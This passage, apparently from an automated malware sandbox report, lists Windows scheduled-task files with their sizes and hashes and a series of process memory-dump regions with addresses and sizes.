                                                                                                                                                                  SHA256

                                                                                                                                                                  98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                                  SHA512

                                                                                                                                                                  1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                                • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                                  Filesize

                                                                                                                                                                  2KB

                                                                                                                                                                  MD5

                                                                                                                                                                  7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                                  SHA1

                                                                                                                                                                  63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                                  SHA256

                                                                                                                                                                  727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                                  SHA512

                                                                                                                                                                  f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                                • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                                  Filesize

                                                                                                                                                                  2KB

                                                                                                                                                                  MD5

                                                                                                                                                                  1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                                  SHA1

                                                                                                                                                                  5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                                  SHA256

                                                                                                                                                                  55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                                  SHA512

                                                                                                                                                                  5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                                • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                                  Filesize

                                                                                                                                                                  2KB

                                                                                                                                                                  MD5

                                                                                                                                                                  0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                                  SHA1

                                                                                                                                                                  9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                                  SHA256

                                                                                                                                                                  a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                                  SHA512

                                                                                                                                                                  c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                                • memory/220-93-0x00007FF934E80000-0x00007FF934F3E000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  760KB

                                                                                                                                                                • memory/220-101-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  160KB

                                                                                                                                                                • memory/220-92-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  2.0MB

                                                                                                                                                                • memory/220-90-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  160KB

                                                                                                                                                                • memory/220-91-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  160KB

                                                                                                                                                                • memory/316-113-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  64KB

                                                                                                                                                                • memory/316-109-0x000002270CD90000-0x000002270CDB7000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  156KB

                                                                                                                                                                • memory/624-105-0x0000019943090000-0x00000199430B7000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  156KB

                                                                                                                                                                • memory/624-103-0x0000019942CA0000-0x0000019942CC2000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  136KB

                                                                                                                                                                • memory/624-111-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  64KB

                                                                                                                                                                • memory/676-115-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  64KB

                                                                                                                                                                • memory/676-106-0x0000020BD4180000-0x0000020BD41A7000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  156KB

                                                                                                                                                                • memory/724-119-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  64KB

                                                                                                                                                                • memory/724-118-0x0000013E115D0000-0x0000013E115F7000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  156KB

                                                                                                                                                                • memory/956-117-0x000001EA74900000-0x000001EA74927000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  156KB

                                                                                                                                                                • memory/1032-126-0x00000218DA780000-0x00000218DA7A7000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  156KB

                                                                                                                                                                • memory/1032-127-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  64KB

                                                                                                                                                                • memory/1144-129-0x0000021722EB0000-0x0000021722ED7000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  156KB

                                                                                                                                                                • memory/1144-130-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  64KB

                                                                                                                                                                • memory/1156-133-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  64KB

                                                                                                                                                                • memory/1156-132-0x000002188C940000-0x000002188C967000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  156KB

                                                                                                                                                                • memory/1636-95-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  128KB

                                                                                                                                                                • memory/1636-94-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  128KB

                                                                                                                                                                • memory/1636-99-0x0000000000E50000-0x0000000000E6A000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  104KB

                                                                                                                                                                • memory/1636-97-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  128KB

                                                                                                                                                                • memory/2320-64-0x0000016FE2DF0000-0x0000016FE2EA2000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  712KB

                                                                                                                                                                • memory/2320-61-0x0000016FD9B80000-0x0000016FDA106000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  5.5MB

                                                                                                                                                                • memory/2320-75-0x0000016FDAE70000-0x0000016FDB032000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  1.8MB

                                                                                                                                                                • memory/2320-65-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  2.0MB

                                                                                                                                                                • memory/2320-73-0x0000016FDA6D0000-0x0000016FDA720000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  320KB

                                                                                                                                                                • memory/2320-85-0x0000016FDAB20000-0x0000016FDAB5C000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  240KB

                                                                                                                                                                • memory/2320-62-0x0000016FE21E0000-0x0000016FE29AA000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  7.8MB

                                                                                                                                                                • memory/2320-63-0x0000016FE29B0000-0x0000016FE2DEE000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4.2MB

                                                                                                                                                                • memory/2320-60-0x00007FF934E80000-0x00007FF934F3E000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  760KB

                                                                                                                                                                • memory/2320-59-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  2.0MB

                                                                                                                                                                • memory/2320-58-0x0000016FBF510000-0x0000016FBF534000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  144KB

                                                                                                                                                                • memory/2320-74-0x0000016FDABE0000-0x0000016FDAC92000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  712KB

                                                                                                                                                                • memory/2320-89-0x0000016FDAB60000-0x0000016FDAB96000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  216KB

                                                                                                                                                                • memory/2320-88-0x00007FF934E80000-0x00007FF934F3E000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  760KB

                                                                                                                                                                • memory/2320-87-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  2.0MB

                                                                                                                                                                • memory/2320-86-0x0000016FDA680000-0x0000016FDA6CE000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  312KB

                                                                                                                                                                • memory/3232-33-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  24KB

                                                                                                                                                                • memory/3232-35-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  24KB

                                                                                                                                                                • memory/3552-22-0x0000019200D50000-0x0000019200DF6000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  664KB

                                                                                                                                                                • memory/3552-15-0x00007FF916740000-0x00007FF917201000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  10.8MB

                                                                                                                                                                • memory/3552-28-0x00000192011A0000-0x00000192011AA000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  40KB

                                                                                                                                                                • memory/3552-26-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  2.0MB

                                                                                                                                                                • memory/3552-381-0x00007FF916743000-0x00007FF916745000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  8KB

                                                                                                                                                                • memory/3552-382-0x00007FF916740000-0x00007FF917201000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  10.8MB

                                                                                                                                                                • memory/3552-25-0x0000019200EC0000-0x0000019200EE2000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  136KB

                                                                                                                                                                • memory/3552-20-0x0000019200300000-0x0000019200D50000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  10.3MB

                                                                                                                                                                • memory/3552-4-0x00007FF916743000-0x00007FF916745000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  8KB

                                                                                                                                                                • memory/3552-23-0x0000019200E00000-0x0000019200E56000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  344KB

                                                                                                                                                                • memory/3552-24-0x0000019200E60000-0x0000019200EB8000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  352KB

                                                                                                                                                                • memory/3552-19-0x00007FF934E80000-0x00007FF934F3E000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  760KB

                                                                                                                                                                • memory/3552-1407-0x00007FF925913000-0x00007FF925914000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  4KB

                                                                                                                                                                • memory/3552-1410-0x00007FF916740000-0x00007FF917201000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  10.8MB

                                                                                                                                                                • memory/3552-18-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  2.0MB

                                                                                                                                                                • memory/3552-17-0x0000019210000000-0x0000019210024000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  144KB

                                                                                                                                                                • memory/3552-16-0x00007FF916740000-0x00007FF917201000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  10.8MB

                                                                                                                                                                • memory/3552-14-0x000001926D2A0000-0x000001926D2C2000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  136KB

                                                                                                                                                                • memory/4364-32-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  16KB

                                                                                                                                                                • memory/4364-29-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                                  Filesize

                                                                                                                                                                  16KB